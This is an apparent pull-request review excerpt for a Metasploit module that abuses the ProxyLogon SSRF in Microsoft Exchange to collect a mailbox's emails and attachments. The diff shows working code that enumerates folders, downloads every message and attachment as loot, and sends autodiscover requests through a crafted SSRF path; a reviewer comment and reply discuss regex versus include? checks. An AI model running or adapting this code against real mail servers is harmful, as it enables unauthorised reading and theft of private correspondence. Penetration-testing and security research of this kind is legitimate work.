modules/auxiliary/gather/exchange_proxylogon_collector.rb

```diff
@@ -0,0 +1,430 @@
+      print_status(" * successfuly connected to: #{datastore['FOLDER']}")
+      xml = Nokogiri::XML.parse(response.body)
+
+      folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS).values[0]
+      print_status(" * selected folder: #{datastore['FOLDER']} (#{folder_id})")
+
+      total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS).content
+      print_status(" * number of email found: #{total_count}")
+
+      if total_count.to_i > datastore['MaxEntries']
+        print_warning(" * number of email recalculated due to max entries: #{datastore['MaxEntries']}")
+        total_count = datastore['MaxEntries'].to_s
+      end
+
+      print_status(message("Processing dump of #{total_count} items"))
+      download_items(total_count, ssrf)
+    end
+  end
+
+  def download_attachments(item_id, ssrf)
+    response = send_xml(soap_listattachments(item_id), ssrf)
+    xml = Nokogiri::XML.parse(response.body)
+
+    xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).each do |item|
+      item_id = item.at_xpath('./t:AttachmentId', XMLNS).values[0]
+
+      response = send_xml(soap_downattachment(item_id), ssrf)
+      data = Nokogiri::XML.parse(response.body)
+
+      filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS).content
+      ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS).content
+      content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS).content
+
+      print_status("   -> attachment: #{item_id} (#{filename})")
+      write_loot("#{datastore['EMAIL']}_#{datastore['FOLDER']}", Rex::Text.decode_base64(content), filename, ctype)
+    end
+  end
+
+  def download_items(total_count, ssrf)
+    response = send_xml(soap_listitems(datastore['FOLDER'], total_count), ssrf)
+    xml = Nokogiri::XML.parse(response.body)
+
+    xml.xpath('//t:Items/t:Message', XMLNS).each do |item|
+      item_info = item.at_xpath('./t:ItemId', XMLNS).values
+      print_status(" * download item: #{item_info[1]}")
+
+      response = send_xml(soap_downitem(item_info[0], item_info[1]), ssrf)
+      data = Nokogiri::XML.parse(response.body)
+
+      email = data.at_xpath('//t:Message/t:MimeContent', XMLNS).content
+      write_loot("#{datastore['EMAIL']}_#{datastore['FOLDER']}", Rex::Text.decode_base64(email))
+
+      attachments = item.at_xpath('./t:HasAttachments', XMLNS).content
+      if datastore['ATTACHMENTS'] && attachments == 'true'
+        download_attachments(item_info[0], ssrf)
+      end
+      print_status
+    end
+  end
+
+  def message(msg)
+    "#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  def request_autodiscover(server_name)
+    xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }
+
+    response = send_xml(soap_autodiscover, "#{server_name}/autodiscover/autodiscover.xml?a=~1942062522")
+    fail_with(Failure::Unknown, 'No Autodiscover information was found') if response.body =~ /<ErrorCode>500<\/ErrorCode>/
```

Comment:
It is preferred to use `include?` instead of a regex for this. It is usually faster since, underneath, it is just a direct string comparison.
```suggestion
    fail_with(Failure::Unknown, 'No Autodiscover information was found') if response.body.include?('<ErrorCode>500</ErrorCode>')
```

Reply:
changed by:
for any others response errors possibles.
```
    case response.body
    when /<ErrorCode>500<\/ErrorCode>/
      fail_with(Failure::Unknown, 'No Autodiscover information was found')
    when /<Action>redirectAddr<\/Action>/
      fail_with(Failure::Unknown, 'No email address was found')
    end
```